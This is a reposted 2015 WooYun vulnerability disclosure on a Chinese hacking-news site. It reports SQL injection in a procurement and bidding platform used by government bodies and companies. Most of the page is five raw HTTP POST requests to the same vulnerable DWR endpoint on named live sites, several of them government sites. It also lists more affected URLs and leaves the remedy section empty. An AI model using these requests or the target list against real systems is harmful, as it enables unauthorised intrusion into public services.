记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某通用系统存在SQL注入,涉及政府、银行、企业和高校

2015-04-07 10:50

郑州信源信息技术股份有限公司是一家专业从事行业应用软件开发、系统集成和信息安全产品开发生产的高新技术企业和软件企业,公司通过了CMMI3级认证和ISO9001质量管理体系认证,是国家火炬计划软件产业基地骨干企业。总公司位于郑州高新技术开发区,占地30多亩,规划建设3万多平方米的软件和信息安全产品研发生产基地,子公司北京信源世通信息技术有限公司位于北京市海淀区中关村科技园区。



该公司客户:http://caigou.xinyuan.com.cn/xmal/index.jhtml

漏洞证明:

1#:http://www.shenhuabidding.com.cn/ibs2_gys/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

code 区域
POST /ibs2_gys/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1

Host: www.shenhuabidding.com.cn

Connection: keep-alive

Content-Length: 274

Origin: http://www.shenhuabidding.com.cn

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: text/plain

Accept: */*

Referer: http://www.shenhuabidding.com.cn/ibs2_gys/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: JSESSIONID=91CE21626E4788033816E4E1F66BAA3F; _xycms=gHWZqZAJTh; CNZZDATA5831188=cnzz_eid%3D796745449-1420552245-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1420557686; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420556542,1420557715; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420560451



callCount=1

httpSessionId=79FBC16525D972693D77BFB97E50E5EB

scriptSessionId=19013B60C978CC428287EE889D0D4319

page=/ibs2_gys/eps/zj/zjgl/zjzc/PszjzcGsgk.html

c0-scriptName=ZjzcFacade

c0-methodName=Mobile

c0-id=4199_1420560509929

c0-param0=string:

c0-param1=string:13112345678



32.jpg





2#:http://www.yy-ggzy.com/ggzy/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

code 区域
POST /ggzy/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1

Host: www.yy-ggzy.com

Proxy-Connection: keep-alive

Content-Length: 269

Origin: http://www.yy-ggzy.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: text/plain

Accept: */*

Referer: http://www.yy-ggzy.com/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: JSESSIONID=AFEC36027EFE71A7E4E68784DAD8AFE7; clientlanguage=zh_CN; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420559458; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420559525



callCount=1

httpSessionId=79FBC16525D972693D77BFB97E50E5EB

scriptSessionId=19013B60C978CC428287EE889D0D4319

page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html

c0-scriptName=ZjzcFacade

c0-methodName=Mobile

c0-id=374_1420561342895

c0-param0=string:

c0-param1=string:13112345678



52.jpg





3#:http://61.163.21.247:8080/ggzy/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

code 区域
POST /ggzy/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1

Host: 61.163.21.247:8080

Proxy-Connection: keep-alive

Content-Length: 270

Origin: http://61.163.21.247:8080

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: text/plain

Accept: */*

Referer: http://61.163.21.247:8080/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: JSESSIONID=003e6acc29d9c0022d781f28a95c; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420559917; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420561648



callCount=1

httpSessionId=79FBC16525D972693D77BFB97E50E5EB

scriptSessionId=19013B60C978CC428287EE889D0D4319

page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html

c0-scriptName=ZjzcFacade

c0-methodName=Mobile

c0-id=5639_1420561689818

c0-param0=string:

c0-param1=string:13112345678



50.jpg





4#:http://www.purchase.gov.cn:8080/nncg/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

code 区域
POST /nncg/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1

Host: www.purchase.gov.cn:8080

Proxy-Connection: keep-alive

Content-Length: 270

Origin: http://www.purchase.gov.cn:8080

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: text/plain

Accept: */*

Referer: http://www.purchase.gov.cn:8080/nncg/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: _xycms=UZiXHivjI4; _gscu_1193392060=20559788hbskoi14; _gscbrs_1193392060=1; CNZZDATA1252992558=900826305-1420555107-http%253A%252F%252Fwww.baidu.com%252F%7C1420555107; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420559832; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420561856



callCount=1

httpSessionId=79FBC16525D972693D77BFB97E50E5EB

scriptSessionId=19013B60C978CC428287EE889D0D4319

page=/nncg/eps/zj/zjgl/zjzc/PszjzcGsgk.html

c0-scriptName=ZjzcFacade

c0-methodName=Mobile

c0-id=9890_1420561912000

c0-param0=string:

c0-param1=string:13112345678



222.jpg





5#:http://www.tyggzy.com/ggzy/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

code 区域
POST /ggzy/dwr/plainjs/ZjzcFacade.Mobile.dwr HTTP/1.1

Host: www.tyggzy.com

Proxy-Connection: keep-alive

Content-Length: 270

Origin: http://www.tyggzy.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: text/plain

Accept: */*

Referer: http://www.tyggzy.com/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html?dlh=null&autoScript=null&spxhID=null

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: JSESSIONID=E90E9F09D48FF7FF42FA1390A25565C3; TKPaoPao=true; clientlanguage=zh_CN; Hm_lvt_f5127c6793d40d199f68042b8a63e725=1420558596,1420563171; Hm_lpvt_f5127c6793d40d199f68042b8a63e725=1420563188



callCount=1

httpSessionId=79FBC16525D972693D77BFB97E50E5EB

scriptSessionId=19013B60C978CC428287EE889D0D4319

page=/ggzy/eps/zj/zjgl/zjzc/PszjzcGsgk.html

c0-scriptName=ZjzcFacade

c0-methodName=Mobile

c0-id=3921_1420563254168

c0-param0=string:

c0-param1=string:13112345678



01.jpg





http://zbap.hnicwx.com/hniceps/eps/zj/zjgl/zjzc/ZjzcMainFrame.html

http://zzcg.ccgp.gov.cn/zzcg/wzxx/gyszc/H601808index_1.htm

..........................

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-090409

阅读:158564 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“某通用系统存在SQL注入,涉及政府、银行、企业和高校”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云